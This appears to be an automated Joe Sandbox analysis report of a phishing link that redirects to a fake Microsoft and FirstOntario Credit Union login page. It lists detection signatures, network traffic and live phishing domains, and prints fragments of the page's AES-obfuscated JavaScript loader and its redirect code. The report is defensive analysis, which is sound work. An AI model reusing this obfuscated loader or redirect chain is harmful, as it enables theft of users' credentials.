Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://clicks.aweber.com/y/ct/?l=1Lr_k&m=h9RNUFV_ixtHDTP&b=0la683CmRD4xZfKbroa5Lg#McGF0dGkucGFzc21vcmVAZmlyc3RvbnRhcmlvLmNvbQ==

Overview

General Information

Sample URL:https://clicks.aweber.com/y/ct/?l=1Lr_k&m=h9RNUFV_ixtHDTP&b=0la683CmRD4xZfKbroa5Lg#McGF0dGkucGFzc21vcmVAZmlyc3RvbnRhcmlvLmNvbQ==
Analysis ID:1492471
Infos:

Detection

HTMLPhisher
Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
Yara detected HtmlPhish70
HTML page contains hidden URLs
HTML page contains suspicious javascript code
Phishing site detected (based on logo match)
Phishing site detected (based on shot match)
Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)
Detected non-DNS traffic on DNS port
Detected suspicious crossdomain redirect
HTML body contains low number of good links
HTML body contains password input but no form action
HTML body with high number of embedded images detected
HTML page contains hidden javascript code
HTML title does not match URL
Uses insecure TLS / SSL version for HTTPS connection

Classification

  • System is w10x64
  • chrome.exe (PID: 6512 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
    • chrome.exe (PID: 2448 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1728 --field-trial-handle=2064,i,17365023842591099660,13906610943497592802,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • chrome.exe (PID: 6876 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://clicks.aweber.com/y/ct/?l=1Lr_k&m=h9RNUFV_ixtHDTP&b=0la683CmRD4xZfKbroa5Lg#McGF0dGkucGFzc21vcmVAZmlyc3RvbnRhcmlvLmNvbQ==" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
1.2.pages.csvJoeSecurity_HtmlPhish_70Yara detected HtmlPhish_70Joe Security
    No Sigma rule has matched
    No Suricata rule has matched

    Click to jump to signature section

    Show All Signature Results

    Phishing

    barindex
    Source: https://bytebloomoe.ru/8QnWX/#McGF0dGkucGFzc21vcmVAZmlyc3RvbnRhcmlvLmNvbQ==LLM: Score: 8 Reasons: The domain 'bytebloomoe.ru' does not match the brand name 'ByteBloom', suggesting a possible phishing attempt. Additionally, the domain extension 'ru' is typically associated with Russia, which may indicate a potential connection to a foreign entity. The minimalistic design and single link on the webpage are also unusual for a legitimate landing page. DOM: 1.2.pages.csv
    Source: https://bytebloomoe.ru/8QnWX/#McGF0dGkucGFzc21vcmVAZmlyc3RvbnRhcmlvLmNvbQ==LLM: Score: 10 Reasons: The domain name 'bytebloomoe.ru' is not associated with Microsoft and is likely a phishing site. The simple design and lack of unusual features are common in phishing attempts to appear legitimate. The use of the Microsoft brand name to trick users into entering their email and password is a clear indication of a phishing attempt. The 'ru' domain extension also suggests a Russian domain, which is unusual for a legitimate Microsoft website. The combination of these factors makes it highly likely that this site is a phishing attempt with a phishing score of 10 out of 10. DOM: 1.3.pages.csv
    Source: https://bytebloomoe.ru/8QnWX/#McGF0dGkucGFzc21vcmVAZmlyc3RvbnRhcmlvLmNvbQ==LLM: Score: 10 Reasons: The domain 'bytebloomoe.ru' does not match the identified brand 'FirstOntario Credit Union', and the domain extension 'ru' indicates it is a Russian domain. The webpage's design and focus on the login form are common tactics in phishing attempts, and it appears to be a phishing attempt using the legitimate brand name to trick users into entering their login credentials. The visual LLM's analysis is consistent with a phishing attempt, and further investigation confirms the legitimacy of the FirstOntario Credit Union's domain as 'firstontario.com'. DOM: 1.4.pages.csv
    Source: Yara matchFile source: 1.2.pages.csv, type: HTML
    Source: https://bytebloomoe.ru/8QnWX/#McGF0dGkucGFzc21vcmVAZmlyc3RvbnRhcmlvLmNvbQ==HTTP Parser: https://technucleuswe.ru///3799.php
    Source: https://bytebloomoe.ru/8QnWX/#McGF0dGkucGFzc21vcmVAZmlyc3RvbnRhcmlvLmNvbQ==HTTP Parser: window.location.href = atob(
    Source: https://bytebloomoe.ru/8QnWX/#McGF0dGkucGFzc21vcmVAZmlyc3RvbnRhcmlvLmNvbQ==Matcher: Template: microsoft matched
    Source: https://bytebloomoe.ru/8QnWX/#McGF0dGkucGFzc21vcmVAZmlyc3RvbnRhcmlvLmNvbQ==Matcher: Template: captcha matched
    Source: https://bytebloomoe.ru/8QnWX/#McGF0dGkucGFzc21vcmVAZmlyc3RvbnRhcmlvLmNvbQ==HTTP Parser: async function tabletop(cache) { <!-- <p>lifes joys are found in the miles driven.</p> --> var {a,b,c,d} = json.parse(cache); return cryptojs.aes.decrypt(a, cryptojs.pbkdf2(cryptojs.enc.hex.parse(d), cryptojs.enc.hex.parse(b), {hasher: cryptojs.algo.sha512, keysize: 64/8, iterations: 999}), {iv: cryptojs.enc.hex.parse(c)}).tostring(cryptojs.enc.utf8); <!-- <span>a cars design reflects its drivers spirit.</span> --> } (async () => { document.write(await tabletop(await (await fetch(await tabletop(atob(`eyjhijoizlbnv3rycetdogdvclpqqujwdg9lcgtjdu1dufzxnfbpuetdwxuxywrkvt0ilcjjijoiyji1nzrlndkzmzu0zji5yjvizmuwothkyzu2nde3yjgilcjiijoiy2uxzdjmzgq5ndq2nzbky2uzmza0mjvhzgfmmmizzmyynwy5zgnkoty1mjywmmrjndnlmwvjmdy2yze1mtdhndhlnjixymfhztu1ntk0odfhnjc1nzg5zji1odnkotk2njm4n2nkntg2n2qym2njzdy3nzfhm2y0ngjimzu1yjflogu3zwi5yjk3mdm1ngvmnmnlymjjntflzje5odq3mzq1ndcwntjhzja2yjnmm2jmntdjzjuxzjgwn2y5yzk0yje4mtnknza3otjhntnjode5nmuxnmq5nwuwmdllnty4mtuwy2e4ythmyzrkzdqyywq3mdewyjgyztq4mzy4nddhnjzhzm...
    Source: https://bytebloomoe.ru/8QnWX/#McGF0dGkucGFzc21vcmVAZmlyc3RvbnRhcmlvLmNvbQ==HTTP Parser: Number of links: 0
    Source: https://bytebloomoe.ru/8QnWX/#McGF0dGkucGFzc21vcmVAZmlyc3RvbnRhcmlvLmNvbQ==HTTP Parser: <input type="password" .../> found but no <form action="...
    Source: https://bytebloomoe.ru/8QnWX/#McGF0dGkucGFzc21vcmVAZmlyc3RvbnRhcmlvLmNvbQ==HTTP Parser: Total embedded image size: 45708
    Source: https://bytebloomoe.ru/8QnWX/#McGF0dGkucGFzc21vcmVAZmlyc3RvbnRhcmlvLmNvbQ==HTTP Parser: Base64 decoded: {"a":"fPMWtrpKC8gUrZjABVtoKpkcuMCPVW4PiPKCYu1adJU=","c":"b2574e493354f29b5bfe098dc56417b8","b":"ce1d2fdd944670dce330425adaf2b3ff25f9dcd9652602dc43e1ec066c1517a48e621baae5559481a675789f2583d9966387cd5867d23ccd6771a3f44bb355b1e8e7eb9b970354ef6cebbc51ef19847...
    Source: https://bytebloomoe.ru/8QnWX/#McGF0dGkucGFzc21vcmVAZmlyc3RvbnRhcmlvLmNvbQ==HTTP Parser: Title: your does not match URL
    Source: https://bytebloomoe.ru/8QnWX/#McGF0dGkucGFzc21vcmVAZmlyc3RvbnRhcmlvLmNvbQ==HTTP Parser: <input type="password" .../> found
    Source: https://bytebloomoe.ru/8QnWX/#McGF0dGkucGFzc21vcmVAZmlyc3RvbnRhcmlvLmNvbQ==HTTP Parser: No favicon
    Source: https://bytebloomoe.ru/8QnWX/#McGF0dGkucGFzc21vcmVAZmlyc3RvbnRhcmlvLmNvbQ==HTTP Parser: No favicon
    Source: https://bytebloomoe.ru/8QnWX/#McGF0dGkucGFzc21vcmVAZmlyc3RvbnRhcmlvLmNvbQ==HTTP Parser: No favicon
    Source: https://bytebloomoe.ru/8QnWX/#McGF0dGkucGFzc21vcmVAZmlyc3RvbnRhcmlvLmNvbQ==HTTP Parser: No favicon
    Source: https://bytebloomoe.ru/8QnWX/#McGF0dGkucGFzc21vcmVAZmlyc3RvbnRhcmlvLmNvbQ==HTTP Parser: No <meta name="author".. found
    Source: https://bytebloomoe.ru/8QnWX/#McGF0dGkucGFzc21vcmVAZmlyc3RvbnRhcmlvLmNvbQ==HTTP Parser: No <meta name="author".. found
    Source: https://bytebloomoe.ru/8QnWX/#McGF0dGkucGFzc21vcmVAZmlyc3RvbnRhcmlvLmNvbQ==HTTP Parser: No <meta name="copyright".. found
    Source: https://bytebloomoe.ru/8QnWX/#McGF0dGkucGFzc21vcmVAZmlyc3RvbnRhcmlvLmNvbQ==HTTP Parser: No <meta name="copyright".. found
    Source: unknownHTTPS traffic detected: 173.222.162.64:443 -> 192.168.2.6:49749 version: TLS 1.0
    Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49715 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:49724 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:49727 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49735 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:59184 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:59197 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:59203 version: TLS 1.2
    Source: global trafficTCP traffic: 192.168.2.6:59183 -> 1.1.1.1:53
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeHTTP traffic: Redirect from: clicks.aweber.com to https://summitadvisor.co/voipmessageauth/
    Source: unknownHTTPS traffic detected: 173.222.162.64:443 -> 192.168.2.6:49749 version: TLS 1.0
    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
    Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
    Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
    Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
    Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
    Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
    Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
    Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
    Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
    Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
    Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
    Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
    Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
    Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
    Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
    Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
    Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
    Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
    Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
    Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
    Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
    Source: global trafficHTTP traffic detected: GET /y/ct/?l=1Lr_k&m=h9RNUFV_ixtHDTP&b=0la683CmRD4xZfKbroa5Lg HTTP/1.1Host: clicks.aweber.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /voipmessageauth/ HTTP/1.1Host: summitadvisor.coConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /8QnWX/ HTTP/1.1Host: bytebloomoe.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://summitadvisor.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://bytebloomoe.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/cc21665cd7b9/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://bytebloomoe.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/0rq59/0x4AAAAAAAhE9zkCiN0ETgsg/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://bytebloomoe.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/cc21665cd7b9/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8b2b466a48c34405&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/0rq59/0x4AAAAAAAhE9zkCiN0ETgsg/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/0rq59/0x4AAAAAAAhE9zkCiN0ETgsg/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: bytebloomoe.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bytebloomoe.ru/8QnWX/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=kn523ugumdhe6h89qej7h3np25
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8b2b466a48c34405&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1850929969:1723574616:8PT3AyiGmN4W4umEYHIb06JjWIFlP6lIjxkzNvrNFc0/8b2b466a48c34405/ca1f4aa5097dc0c HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/pat/8b2b466a48c34405/1723579057992/a91dc2b27de76374949a5aaa4b4f6973df0e1dcc1f382531160071965982b7b2/xD8E48zaUVWvwil HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/0rq59/0x4AAAAAAAhE9zkCiN0ETgsg/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/8b2b466a48c34405/1723579057997/X0zYzRAJGWXc7Vm HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/0rq59/0x4AAAAAAAhE9zkCiN0ETgsg/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/8b2b466a48c34405/1723579057997/X0zYzRAJGWXc7Vm HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1850929969:1723574616:8PT3AyiGmN4W4umEYHIb06JjWIFlP6lIjxkzNvrNFc0/8b2b466a48c34405/ca1f4aa5097dc0c HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1850929969:1723574616:8PT3AyiGmN4W4umEYHIb06JjWIFlP6lIjxkzNvrNFc0/8b2b466a48c34405/ca1f4aa5097dc0c HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://bytebloomoe.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /8QnWX/, HTTP/1.1Host: bytebloomoe.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bytebloomoe.ru/8QnWX/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=kn523ugumdhe6h89qej7h3np25
